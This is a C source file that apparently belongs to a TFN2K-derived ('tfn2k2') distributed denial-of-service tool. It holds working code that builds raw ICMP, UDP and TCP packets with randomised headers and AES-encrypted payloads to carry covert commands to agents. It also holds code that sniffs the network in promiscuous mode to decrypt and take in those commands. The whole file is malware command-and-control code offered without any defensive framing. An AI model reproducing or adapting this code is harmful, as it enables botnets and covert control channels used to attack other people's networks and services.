#include <mix/net.h>
#include <mix/mix.h>

#ifdef LM_USE_NET2

char *lm_device = NULL;
struct libnet_link_int *lm_fd = NULL;
unsigned char *lm_curpkt = NULL;
struct ether_addr *srcmacp = NULL;
int lm_curpsiz = 0;
pcap_t *pcap_fd = NULL;
int pcap_l2offset = 0;
char tfn2k2_command = '\0'; /* Last command */
int tfn2k2_lastsize = 0;

void
lm_libnet_init(void)
{
 if(lm_curpkt == NULL)
   libnet_init_packet(8192, &lm_curpkt);

 if(lm_device == NULL)
  {
   unsigned char r0ut3[LIBNET_ERRBUF_SIZE];
   struct sockaddr_in sin;
   if (libnet_select_device (&sin, (char**)&lm_device, (char *)r0ut3) == -1)
        libnet_error(LIBNET_ERR_FATAL, "libnet_select_device: %s\n", r0ut3);
  }

  if(srcmacp == NULL)
  {
	  char r0ut3[LIBNET_ERRBUF_SIZE];
	  srcmacp = libnet_get_hwaddr(lm_fd, (char *)lm_device, r0ut3);
  }
  
 if(lm_fd == NULL)
  {
   char r0ut3[LIBNET_ERRBUF_SIZE];
   lm_fd = libnet_open_link_interface(lm_device, r0ut3);
   if (lm_fd == NULL)
       libnet_error(LIBNET_ERR_FATAL, "libnet_open_link_interface: %s\n", r0ut3);
  }
}

void
lm_libnet_destroy(void)
{
 (void) libnet_close_link_interface(lm_fd);
 libnet_destroy_packet(&lm_curpkt);
}

/* ATTENTION: This function overwrites the first 3 payload bytes */

void
tfn2k2transmit(unsigned long from, unsigned long to, int proto, char id, char *payload, int payloadsize)
{
	char *aes_buf;
	int aes_size;
	int ipproto = proto;
	
	lm_libnet_init();

	payload[0] = (char) getrandom(0,256);
	payload[1] = id;
	payload[2] = payload[0] + 1;
	
	/* aes_binary = 1; */
	/* alg = RIJNDAEL; */
	aes_size=payloadsize;
	aes_buf=(char *)aes_encrypt((const u1byte *)payload,&aes_size);
	
	switch((proto < 0)?getrandom(0,2):proto)
	{
		case 0:
			ipproto = IPPROTO_ICMP;
			break;
		case 1:
			ipproto = IPPROTO_UDP;
			break;
		case 2:
			ipproto = IPPROTO_TCP;
			break;
	}
	
	libnet_build_ethernet((u_char *)"\xff\xff\xff\xff\xff\xff", (unsigned char *)srcmacp, ETHERTYPE_IP, NULL, 0, lm_curpkt);
	
	switch(ipproto)
	{
		case IPPROTO_ICMP: /* ICMP */
			libnet_build_ip(aes_size+LIBNET_ICMP_ECHO_H,
					0,
					htons(getrandom(1024,65535)),
					0,
					getrandom(128,255),
					P_ICMP,
					from,
					to,
					NULL,
					0,
					lm_curpkt+LIBNET_ETH_H);
			libnet_build_icmp_echo(
					getrandom(0,1)?ICMP_ECHOREPLY:ICMP_ECHO,
					0,
					getrandom(0,1)?getrandom(0,65535):0,
					getrandom(0,1)?getrandom(0,65535):0,
					(const u_char *)aes_buf,
					aes_size,
					lm_curpkt+LIBNET_ETH_H+LIBNET_IP_H);
			lm_curpsiz = LIBNET_IP_H+LIBNET_ICMP_ECHO_H+aes_size;
			libnet_do_checksum(lm_curpkt+LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H);
			libnet_do_checksum(lm_curpkt+LIBNET_ETH_H, IPPROTO_ICMP, LIBNET_ICMP_ECHO_H+aes_size);
			break;
		case IPPROTO_UDP: /* UDP */
			libnet_build_ip(aes_size+LIBNET_UDP_H,
					0,
					htons(getrandom(1024,65535)),
					0,
					getrandom(128,255),
					P_UDP,
					from,
					to,
					NULL,
					0,
					lm_curpkt+LIBNET_ETH_H);
			libnet_build_udp(htons(getrandom(0,65535)),
					htons(getrandom(0,65535)),
					(const u_char *)aes_buf,
					aes_size,
					lm_curpkt+LIBNET_ETH_H+LIBNET_IP_H);
			lm_curpsiz = LIBNET_IP_H+LIBNET_UDP_H+aes_size;
			libnet_do_checksum(lm_curpkt+LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H);
			libnet_do_checksum(lm_curpkt+LIBNET_ETH_H, IPPROTO_UDP, LIBNET_UDP_H+aes_size);
			break;
		case IPPROTO_TCP: /* TCP */
			libnet_build_ip(aes_size+LIBNET_TCP_H,
					0,
					htons(getrandom(1024,65535)),
					0,
					getrandom(128,255),
					P_TCP,
					from,
					to,
					NULL,
					0,
					lm_curpkt+LIBNET_ETH_H);
			libnet_build_tcp(htons(getrandom(0,65535)),
					htons(getrandom(0,65535)),
					getrandom(0,1)?htonl (getrandom (0, 65535)+(getrandom (0, 65535) << 8)):0,
					getrandom(0,1)?htonl (getrandom (0, 65535)+(getrandom (0, 65535) << 8)):0,
					getrandom (0, 1) ? (getrandom (0, 1) ? SYN : ACK) : (getrandom(0,1)?(SYN | ACK):0),
					getrandom (0, 1) ? htons (getrandom (0, 65535)) : 0,
					0,
					(const u_char *)aes_buf,
					aes_size,
					lm_curpkt+LIBNET_ETH_H+LIBNET_IP_H);
			lm_curpsiz = LIBNET_IP_H+LIBNET_TCP_H+aes_size;
			libnet_do_checksum(lm_curpkt+LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H);
			libnet_do_checksum(lm_curpkt+LIBNET_ETH_H, IPPROTO_TCP, LIBNET_TCP_H+aes_size);
			break;
		default:
			fatal("Y0ur c0d1ng sk1ll5 4r3 1nf3r10r.\n");
			break;
	}

	lm_curpsiz += LIBNET_ETH_H;

	if(strstr(lm_device,"ppp") || strstr(lm_device,"lo"))
	{
		int tmpsock=libnet_open_raw_sock(ipproto);
		libnet_write_ip(tmpsock, lm_curpkt+LIBNET_ETH_H,lm_curpsiz-LIBNET_ETH_H);
		libnet_close_raw_sock(tmpsock);
	}
	else
	if (libnet_write_link_layer(lm_fd, (char *)lm_device, lm_curpkt, lm_curpsiz) < lm_curpsiz)
		libnet_error(LIBNET_ERR_WARNING, "libnet_write_link_layer: short write\n");
	
	LMDELETE(aes_buf);
}

void
lm_libpcap_init()
{
	char lblg0v[4096];
	bpf_u_int32 localnet, netmask;
	struct bpf_program fcode;
	
	if(lm_device == NULL)
		lm_device=pcap_lookupdev(lblg0v);

	if(lm_device == NULL)
	{
		fatal("Can't determine lm_device (%s -- no ethernet?). Try hardcoding the devicename.\n", lblg0v);
	}

	if(pcap_fd != NULL)
		return;

	if ((pcap_fd = pcap_open_live(lm_device, 8192, 1, 1000, lblg0v)) == NULL)
	{
		fatal("Error opening device: %s\n", lblg0v);
	}

	if(pcap_lookupnet(lm_device, &localnet, &netmask, lblg0v) < 0)
	{
		fatal("ACK! lookupnet on %s: %s\n", lm_device, lblg0v);
	}

	if (pcap_compile(pcap_fd, &fcode, "tcp or icmp or udp", 1, netmask) < 0)
	        fatal("Ouch: %s", pcap_geterr(pcap_fd));
	
	pcap_setfilter(pcap_fd, &fcode);

	switch(pcap_datalink(pcap_fd))
	{
		case DLT_EN10MB:
			pcap_l2offset = 14;
		break;
		case DLT_NULL:
		case DLT_PPP:
			pcap_l2offset = 4;
		break;
		case DLT_SLIP:
			pcap_l2offset = 16;
		break;
		case DLT_RAW:
			pcap_l2offset = 0;
		break;
		case DLT_SLIP_BSDOS:
		case DLT_PPP_BSDOS:
			pcap_l2offset = 24;
		break;
		case DLT_ATM_RFC1483:
			pcap_l2offset = 8;
		break;
		case DLT_IEEE802:
			pcap_l2offset = 22;
		break;
		default:
                fatal("unknown datalink type\n");
	}
}

void
lm_libpcap_destroy()
{
	pcap_close(pcap_fd);
}

char *
tfn2k2read()
{
	struct pcap_pkthdr hdr;
	unsigned char *rawpacket, *payload;
	char *clear, *data;
	struct tribe *tribeh;
	struct lmip *ih;
	int msgsize = 0;
	
	if(pcap_fd == NULL)
		lm_libpcap_init();

	rawpacket = (unsigned char *)pcap_next(pcap_fd, &hdr);
	(char *)rawpacket += pcap_l2offset;
	
	ih = (struct lmip *)rawpacket;
	switch(ih->pro)
	{
		case P_TCP:
			payload = (rawpacket + sizeof(struct lmip) + sizeof(struct lmtcp));
			msgsize = hdr.len - pcap_l2offset - sizeof(struct lmip) - sizeof(struct lmtcp);
			break;
		case P_ICMP:
			payload = (rawpacket + sizeof(struct lmip) + sizeof(struct lmicmp));
			msgsize = hdr.len - pcap_l2offset - sizeof(struct lmip) - sizeof(struct lmicmp);
			break;
		case P_UDP:
			payload = (rawpacket + sizeof(struct lmip) + sizeof(struct lmudp));
			msgsize = hdr.len - pcap_l2offset - sizeof(struct lmip) - sizeof(struct lmudp);
			break;
		default:
			return NULL;
	}

	/* aes_binary = 1; */
	/* alg = RIJNDAEL; */
	clear = (char *)aes_decrypt((const u1byte *) payload, msgsize);
	tribeh = (struct tribe *)clear;
	if((tribeh->start == (tribeh->end-1))) /* tfn2k2 protocol */
	{
		data = LMNEW(char, msgsize + sizeof(struct tribe) + 32);
		memcpy(data, clear + sizeof(struct tribe), msgsize-sizeof(struct tribe));

		tfn2k2_command = tribeh->id;
		tfn2k2_lastsize = (msgsize-sizeof(struct tribe));
		
		LMDELETE(clear);
		return data;
	}
	
	LMDELETE(clear);
	return NULL;
}

#endif
